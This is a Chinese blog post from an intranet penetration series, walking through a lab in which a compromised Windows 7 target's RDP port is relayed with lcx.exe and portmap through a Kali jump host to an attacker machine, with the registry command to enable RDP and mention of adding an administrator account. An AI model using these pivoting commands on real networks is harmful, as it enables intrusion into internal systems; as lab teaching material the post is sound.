端口转发之lcx与portmap结合利用

最新推荐文章于 2024-04-20 10:09:41 发布
最新推荐文章于 2024-04-20 10:09:41 发布
阅读量1.1k 收藏
点赞数
分类专栏: 内网渗透 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/113794719
版权

目录

端口转发

端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。

比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。当路由器的10000端口收到消息时,就知道把消息发送给他,而当20000端口收到消息时,就知道把消息发送给你。这就是端口转发,其转发一个端口收到的流量,给另一个主机。

简单解释端口转发:
你给我了,我打开看看,发现这上面标志显示是要给张三,那么我就给张三去。如果标志是给李四,那我就再给李四去。

端口转发与端口映射的区别

转发的重点在“转”上面。送快递的过来,把所有快递都交给门口保安,保安再根据每件快递上的收件人来分发。映射,就是在大门口给每个人装个柜子,送快递的直接按收件人名字,把快递放到对应的柜子里面。

工具介绍

windows版lcx.exe,linunx版为portmap
对于不同的环境下可通过两者工具之间配合利用

lcx

经典的端口转发工具,基于Socket套接字的端口转发工具
在这里插入图片描述
Lcx有两大功能,一个是端口转发(listen和slave成对使用),另一个是端口映射(tran)
端口转发:
Lcx -Listen <监听slave请求的端口(对应slave 的第二个参数)> <等待连接的端口>
Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>
端口映射:
Lcx -tran <等待连接的端口> <目标ip> <目标端口>
如何使用请跳转至 lcx作端口映射

portmap

在这里插入图片描述
从图中可以看到一些参数应该都好理解。
这里有一个-m参数的解释:以以下哪种方式来用这个工具
然后下面有三个方式:
1.监听port1 端口并且连接主机2的port2 端口
2.监听port1和port2 端口
3.连接主机1对应的端口和主机2对应的端口

实验利用

在这里插入图片描述

  1. 攻击机:ubuntu —— 192.168.101.128
  2. 跳板机:kali2020 —— 192.168.101.129 ,10.10.10.130
  3. 靶    机:win7 —— 10.10.10.128

Win7靶机
首先在靶机先开启rdp端口
开启3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看远程终端:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
(0xd3d 3389)
在这里插入图片描述
使用lcx工具及slave参数,命令表示,将靶机127.0.0.1或10.10.10.128的3389端口的所有数据转发到10.10.10.130(跳板机)
lcx.exe -slave 10.10.10.130 4444 127.0.0.1 3389
在这里插入图片描述
下图是靶机下工具正常使用的情况
在这里插入图片描述

Kali跳板机
使用portmap工具以第二种方式,因为不能用一个端口做两件事,所以需要监听本地4444端口,将其转发至跳板机即本地机器192.168.101.129的7777端口
./portmap -m 2 -p1 4444 -h2 192.168.101.129 -p2 7777
在这里插入图片描述

Ubuntu攻击机
使用ubuntu自带的remmina远程连接工具,尝试连接跳板机的7777端口,将访问到win7靶机的3389端口服务
在这里插入图片描述
尝试远程连接是没问题的在这里插入图片描述
原因是当前win7用户使用中(可通过切换到别的用户登录再远程当前用户试试)
在这里插入图片描述
尝试新建一个用户并纳入管理员组
在这里插入图片描述
连接新用户,可以看到正常使用
在这里插入图片描述

总结

当内网目标机器权限被拿下,外网机器又没办法直接连接内网机器服务,我们就可以将内网机器的服务端口转发到拥有内外网卡的机器即跳板机端口上,然后外网机器就可以访问内外网机器的转发端口即可访问到内网指定的服务。
 
参考链接:
https://xie1997.blog.csdn.net/article/details/84539150
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
专栏目录
Linux端口转发的几种常用方法
08-24 2万+
在一些实际的场景里,我们需要通过利用一些端口转发工具,比如系统自带的命令行工具或第三方小软件,来绕过网络访问限制触及目标系统。 本文总结了Linux端口转发的一些常用方法,欢迎补充和指正。 01、SSH 端口转发 SSH 提供了一个非常有意思的功能,就是端口转发,它能够将其他 TCP 端口的网络数据通过 SSH 链接来转发,并且自动提供了相应的加密及解密服务。 (1)本地端口转发 ss...
内网隧道代理技术(二)之LCX端口转发
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-12 1585
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMapLCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。
lcx_portmap.zip
05-17
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmaplcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran)
【渗透测试笔记】之【内网渗透——传输层隧道(lcxportmap)的使用:边界服务器分别为Windows和Linux下本地端口映射、转发)】
AA8j的博客
10-16 2032
文章目录1. lcx1.1 下载与部署1.2 使用方法1.2.1 内网端口转发2. netcat2.1 下载与部署kali2.2 使用方法kali2.3 效果演示3. PowerCat3.1 下载与部署kali3.2 使用方法kali3.3 效果演示 1. lcx 实验环境: kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:
portmap 端口转发
ailx10
07-23 2282
前面我们已经学习了ssh端口转发、防火墙端口转发、rinetd端口转发、nc端口转发、socat端口转发,今天我们来学习portmap 端口转发portmap 是Linux下的LCX,那么自然先来回顾一下windows下的LCX:「ailx10:Lcx端口转发初探」,这个实验当初真的耗费很大心血,真的不容易,现在复习一遍,感觉非常简单,恐怕这就叫成长吧,文章末尾有彩蛋~实验环境:macos:19...
网络测试中端口转发工具(lcx.exe,portmap利用简析
Alexz__的博客
03-30 4702
1,端口转发含义 2,lcx.exe工具使用 3,portmap脚本使用 4,简单的ssh登录端口转发 5,端口转发实现http包转发 壹 什么是端口转发 端口转发,有时也被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内...
PortMap1.6与使用说明书
06-13
大家出于安全考虑在内网环境中建立数据中心服务器,但要通过 Internet访问内网中的服务器,必须进行端口映射。而实现端口映射的方法很多,在此向大家推荐一款端口映射软件PortMap。在PortMap的帮助下,大家只要进行一些简单的操作就可以实现外网访问内网的功能.
隐藏隧道通信:lcx 端口转发
f_carey的博客
10-17 4378
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 隐藏隧道通信:lcx 端口转发 1 lcx 端口转发原理 lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。 一个基本的 Socket 隧道必须包含两端: 服务端:监听一个端口,等待客户端连接 客户端:通过传入服务端的 IP 地址和.
流量映射端口反弹(lcx,ew)
wjq18827615690的博客
01-31 769
转载自西梅哥的有道云:https://note.youdao.com/ynoteshare1/index.html?id=a6bf797cce0b6087cb78b44818dca69f&type=note 内网应用 一、端口转发工具: 1.LCX(支持双系统) A、window(LCX) 上传一些内网主机探测的工具 ms17010(适合08,07) 1.首先安装lcx(正向连接) 在内网主机:转发:lcx.exe–slave公网主机ip公网主机端口内网主机ip内网...
portmap
大AI时代,人性化的信息更加难得可贵
08-15 119
portmap是一个服务,用于联系RPC客户端和服务端之间的连接,告诉客户端可以连接哪个端口。
端口映射器(Portmap)
03-16
端口映射器(Portmap) 1.0 使用说明 1、主要功能: 该工具可以将A机器上的某一个端口(可设置)映射到B机器的某个端口(可设置),也就是将这两个端口的数据传输对应起来,其工作流程是这样的: 在机器A的端口接收到连接请求以后,Portmap马上试图连接B机器的端口,连接成功后,Portmap就在这两个端口之间就建立起一条数据通路,进行数 据转发,任何一方关闭连接,数据通路就断开。 2、设置 所有的设置都在Portmap.ini中,每一个Entry代表建立一个数据转发器,一共支持1024个。 3、安装方式 系统可以以NT系统服务方式运行,也可以直接运行(9x下); 1、下载 直接将文件解压缩一个独立的目录下面(注意不能有空格和中文名), 2、安装服务 Portmapsvc -install 安装后,服务将把自己设为自动启动; 3、卸载服务 Portmapsvc -uninstall 4、启动和停止服务 请到NT服务控制器执行! 5、9x下直接运行 请在命令行下键入: Portmapsvc -run 即可. 4、Portmap.ini说明 Enable=1 ;; 1代表启用这个数据转发器, 0则相反 InnerIP=192.168.1.198 ;; B机器的IP地址 InnerPort=21 ;; B机器的端口 ServerIP=x.x.x.x ;; A机器的IP地址 ServerPort=5021 ;; A机器的端口 5、注册方式 该软件可以免费使用,但是如果你不希望每次启动时都打开注册对话框,你可以考虑注册,注册请联系: MSN: skyvense@msn.com ICQ: 104180227 OICQ: 2091910 Email: skyvense@online.sh.cn, skyvense@vip.sina.com 张小峰(2002/10/02 01:59)
PortMap(端口映射工具) V1.6 免费版
12-16
PortMap(端口映射工具) V1.6 免费版 亲测可用!
portmap工具
08-06
portmap工具 ,非常好用的端口映射工具
portmap-0.1.tar.gz
07-27
portmap
端口映射器PortMap.exe
04-23
端口映射器PortMap.exe 使用方法在里面
端口映射(port map
QQ604666459的博客
02-18 9898
端口映射(port map)端口映射用来定义实例间的内部连接。 A port map is used to define the interconnection between instances.语法(Syntax)port map ( [ 端口名 => ] 设定值, ... )port map ( [ port_name => ] expression, ... )说明(Description
Portmap 服务
weixin_34178244的博客
03-20 1215
2019独角兽企业重金招聘Python工程师标准>>> ...
探索PortMap:简单而强大的端口映射工具
最新发布
gitblog_00005的博客
04-20 1330
探索PortMap:简单而强大的端口映射工具 项目地址:https://gitcode.com/Jackarain/portmap 在互联网的世界里,有时我们需要将内部网络服务暴露给外部访问,或者反之。这通常涉及到端口映射的概念。今天,我们要介绍的PortMap是一个轻量级、易于使用的端口映射工具,由开发者Jackarain精心打造。本文将深入探讨PortMap的功能、技术原理和应用场景,帮助你更...
portmap安装
weixin_30650859的博客
12-07 1779
转载于:https://www.cnblogs.com/boqinyaxin/p/4354137.html
端口转发工具lcx流量特征
05-17
LCX是一种常用的端口转发工具,它可以在本地和远程主机之间建立TCP连接,并将数据在连接之间转发。由于LCX转发的是TCP流量,因此其流量特征如下: 1. TCP协议:LCX是基于TCP协议的端口转发工具,因此其流量中只会有TCP协议的数据包。 2. 源IP地址和端口:LCX会将本地主机的IP地址和端口作为源地址和源端口,发送数据到远程主机。 3. 目标IP地址和端口:LCX会将远程主机的IP地址和端口作为目标地址和目标端口,将数据转发到远程主机。 4. 数据长度:LCX转发的数据长度可以根据实际情况不同而不同。 5. 数据内容:LCX转发的数据内容可以是任意的TCP数据,包括HTTP、FTP、SSH等各种应用层协议的数据。 总的来说,LCX的流量特征较为简单,基本都是TCP协议数据包,包含源IP地址和端口、目标IP地址和端口、数据长度和数据内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值